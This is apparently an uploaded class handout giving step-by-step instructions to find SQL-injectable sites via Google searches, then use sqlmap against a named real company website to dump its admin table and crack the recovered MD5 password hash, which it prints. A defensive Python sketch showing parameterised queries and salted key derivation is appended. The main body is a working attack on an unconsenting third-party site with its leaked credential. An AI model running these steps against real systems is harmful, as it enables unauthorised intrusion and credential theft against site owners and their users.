SQLMap Hashing

Uploaded by

rendralestiyanto
Copyright
© All Rights Reserved

Hack a website using SQLMap

Objectives:

- Finding websites that have a vulnerability
- Getting the database (focusing on user name and password) using sqlmap
- Cracking the hashed password

Finding websites that have a vulnerability

1. Log in to BackTrack.
2. Ping a host to check the internet connectivity.
3. Click on Applications > BackTrack > Vulnerability Assessment > Web Application Assessment > Web Vulnerability Scanners > sqlmap.
4. Open Google to find a vulnerable website. Type php?id=1 in the search box. To make it easier, try co.id websites, so type co.id php?id=1
In this class activity, we will use gree.co.id.

5. Click one of the results and, to check for the vulnerability, type ' at the end of the URL:
http://gree.co.id/profile.php?id=1'

6. If the website shows an error message, it means that the website has the vulnerability.

Getting the database (focusing on user name and password) using sqlmap

7. Now go back to BackTrack and type: python sqlmap.py -u http://gree.co.id/profile.php?id=1 --dbs

8. If it stops at the following prompt, answer N:
[13:50:26] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N

9. The program will stop and show the database name:

10. Type: python sqlmap.py -u http://gree.co.id/profile.php?id=1 -D greecoid_dbgree --tables


11. You will get the tables:
12. We are interested in the table td_user_admin. Type: python sqlmap.py -u http://gree.co.id/profile.php?id=1 -D greecoid_dbgree -T td_user_admin --columns

13. We will get:


14. Type: python sqlmap.py -u http://gree.co.id/profile.php?id=1 -D greecoid_dbgree -T td_user_admin --dump

15. Answer the prompts as shown below:


[13:57:09] [INFO] analyzing table dump for possible password hashes
recognized possible password hashes in column 'PASSWORD'. Do you want to crack them via a
dictionary-based attack? [Y/n/q] Y

[13:57:27] [INFO] using hash method 'md5_generic_passwd'


what dictionary do you want to use?
[1] default dictionary file '/pentest/database/sqlmap/txt/wordlist.txt' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>1

[13:58:44] [INFO] using default dictionary


[13:58:44] [INFO] loading dictionary from '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] n

16. We will find the hashed password:

Crack the hashed password

17. We find the user name admin and the password b1dbcc58230e213bbbfcc108a7b4fb68 (hashed).
18. Click on Applications > BackTrack > Privilege Escalation > Password Attacks > Online Attacks > findmyhash

19. Type: python ./findmyhash.py MD5 -h b1dbcc58230e213bbbfcc108a7b4fb68

20. We will get:
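
Added example (not part of the original document): the two weaknesses this lab relies on, seen from the application side, each next to a corrected form. The quote test in steps 5-6 works because the id value is pasted into the SQL text, and the lookup in steps 15-20 works because the password is stored as unsalted MD5. The table name, function names, sample password and the choice of PBKDF2 are assumptions made for this sketch.

```python
import hashlib, hmac, os, re, sqlite3

ITERATIONS = 600_000  # assumed PBKDF2 work factor for this sketch

def make_db():
    # Constructed stand-in for the table behind profile.php?id=
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE profile (id INTEGER PRIMARY KEY, body TEXT)")
    db.execute("INSERT INTO profile VALUES (1, 'About us')")
    return db

def profile_concat(db, raw_id):
    # Weak pattern: the request value becomes part of the SQL text,
    # so a stray quote reaches the parser and the error leaks to the page.
    try:
        return db.execute("SELECT body FROM profile WHERE id = " + raw_id).fetchall()
    except sqlite3.Error as exc:
        return "SQL error: %s" % exc

def profile_bound(db, raw_id):
    # Corrected pattern: accept only a short decimal id, then bind it.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []
    return db.execute("SELECT body FROM profile WHERE id = ?", (int(raw_id),)).fetchall()

def md5_record(password):
    # Weak storage: the same password always gives the same 32-hex digest.
    return hashlib.md5(password.encode()).hexdigest()

def kdf_record(password, salt=None):
    # Corrected storage: per-user random salt plus a slow KDF.
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest

def kdf_verify(password, record):
    # Recompute with the stored salt and compare in constant time.
    salt, digest = record
    return hmac.compare_digest(kdf_record(password, salt)[1], digest)

if __name__ == "__main__":
    db = make_db()
    print(profile_concat(db, "1'"))   # parser error surfaces to the caller
    print(profile_bound(db, "1'"))    # rejected before any SQL runs
    print(md5_record("Winter2024") == md5_record("Winter2024"))  # constructed password
    a, b = kdf_record("Winter2024"), kdf_record("Winter2024")
    print(a != b, kdf_verify("Winter2024", a))
```

Because identical passwords give identical MD5 digests, one precomputed table answers for every account, while the salted records differ per user and each guess costs a full KDF run.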
